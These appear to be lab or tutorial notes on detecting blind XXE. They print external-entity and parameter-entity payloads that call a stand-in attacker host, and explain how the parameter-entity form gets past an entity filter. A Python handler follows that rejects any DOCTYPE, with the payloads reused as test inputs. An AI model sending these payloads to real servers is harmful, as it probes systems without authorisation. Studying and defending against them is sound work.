Identification

We can normally detect Blind XXE the same way we trigger an XXE-based SSRF attack: declare an external entity that points at a host we control.

<!DOCTYPE d0p [ <!ENTITY xxe SYSTEM "http://ATTACKER IP"> ]>

This payload makes the server issue a back-end HTTP request to the attacker's URL. Meanwhile, the attacker can monitor for the resulting DNS lookup and HTTP request; seeing either one confirms that a Blind XXE is present.

Use the above payload in the product-check XML body, replace the placeholder host with your current Burp Collaborator client's host, and watch for an HTTP ping back.

Sometimes, XXE attacks using regular entities are blocked, because the application's back end validates the input or has hardened the configuration of its XML parser.

In such situations, we might use XML parameter entities instead. A parameter entity is a special kind of XML entity that can only be referenced elsewhere within the DTD.

  • The declaration of an XML parameter entity includes the percent character before the entity name:

<!ENTITY % myparameterentity "my parameter entity value" >
  • Parameter entities are referenced using the percent character instead of the usual ampersand (&):

%myparameterentity;

This means we can detect Blind XXE using out-of-band network interaction with the following payload:

<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://ATTACKER'S IP"> %xxe; ]>

When we try our usual way to exploit this, we get an error stating "Entities aren't allowed because of security reasons".

So this means we can't declare a regular external entity and reference it in the productId parameter.

This XXE payload creates an XML parameter entity called xxe and then references it (%xxe;) within the DTD itself, so the parser fetches the external URL while it is still processing the DTD, before any element content such as productId is parsed.
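From the defending side, the reason both payloads above work is that the parser is allowed to process a DTD at all. The following is an added example (not code from the original notes or from any lab application) showing how a stock-check handler built on Python's standard expat bindings can refuse the DOCTYPE outright, which stops both the regular external entity and the parameter-entity variant before any out-of-band DNS or HTTP request can leave the server. The element names stockCheck/productId, the placeholder host and the three sample bodies are constructed for this example.

```python
import xml.parsers.expat as expat


class DtdNotAllowed(ValueError):
    """Raised when a request body carries a DOCTYPE or any entity declaration."""


def parse_stock_check(xml_text: str) -> dict:
    """Parse a <stockCheck><productId>N</productId></stockCheck> body.

    The parser refuses the DTD outright, so neither a general external entity
    (<!ENTITY xxe SYSTEM ...>) nor a parameter entity (<!ENTITY % xxe SYSTEM ...>
    followed by %xxe;) can be declared or dereferenced. Without a DTD there is
    nothing for the parser to fetch, so no out-of-band request is made.
    """
    parser = expat.ParserCreate()
    collected = {"productId": []}
    open_elements = []  # stack of element names currently open

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # Any DOCTYPE, with or without an internal subset, is rejected.
        raise DtdNotAllowed(f"DOCTYPE {name!r} is not accepted")

    def entity_decl(name, is_param, value, base, sysid, pubid, notation):
        # Defence in depth: unreachable once DOCTYPE is refused, but keeps a
        # parser that tolerates DOCTYPE from declaring entities.
        prefix = "%" if is_param else "&"
        raise DtdNotAllowed(f"entity {prefix}{name}; is not accepted")

    def external_entity_ref(context, base, sysid, pubid):
        # Returning 0 makes expat abort the parse rather than fetch sysid.
        return 0

    def start_element(name, attrs):
        open_elements.append(name)

    def end_element(name):
        open_elements.pop()

    def char_data(data):
        # expat may deliver text in several chunks; collect and join later.
        if open_elements and open_elements[-1] == "productId":
            collected["productId"].append(data)

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = char_data

    try:
        parser.Parse(xml_text, True)
    except DtdNotAllowed as exc:
        return {"status": "rejected", "reason": str(exc)}
    except expat.ExpatError as exc:
        return {"status": "rejected", "reason": f"malformed XML: {exc}"}

    product_id = "".join(collected["productId"]).strip()
    if not product_id.isdigit():
        return {"status": "rejected", "reason": "productId must be numeric"}
    return {"status": "ok", "productId": int(product_id)}


# Constructed sample inputs. The two hostile bodies reuse the payload shapes
# from the notes with a placeholder host; the third is a benign request.
BENIGN = "<?xml version='1.0'?><stockCheck><productId>1</productId></stockCheck>"
GENERAL_ENTITY = (
    "<?xml version='1.0'?>"
    '<!DOCTYPE d0p [ <!ENTITY xxe SYSTEM "http://PLACEHOLDER.collab.invalid"> ]>'
    "<stockCheck><productId>&xxe;</productId></stockCheck>"
)
PARAMETER_ENTITY = (
    "<?xml version='1.0'?>"
    '<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://PLACEHOLDER.collab.invalid"> %xxe; ]>'
    "<stockCheck><productId>1</productId></stockCheck>"
)

if __name__ == "__main__":
    for label, body in [("benign", BENIGN), ("general entity", GENERAL_ENTITY),
                        ("parameter entity", PARAMETER_ENTITY)]:
        print(f"{label:17} -> {parse_stock_check(body)}")
```

The design point is that rejecting at the DOCTYPE level does not depend on recognising a particular entity syntax, so the parameter-entity form that slips past a check aimed only at &name; references is refused by the same rule. Pairing this with egress monitoring on the XML-processing host (alerting on DNS lookups or HTTP connections to hosts the application never needs) gives a detection for any parser that was left in its permissive state.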
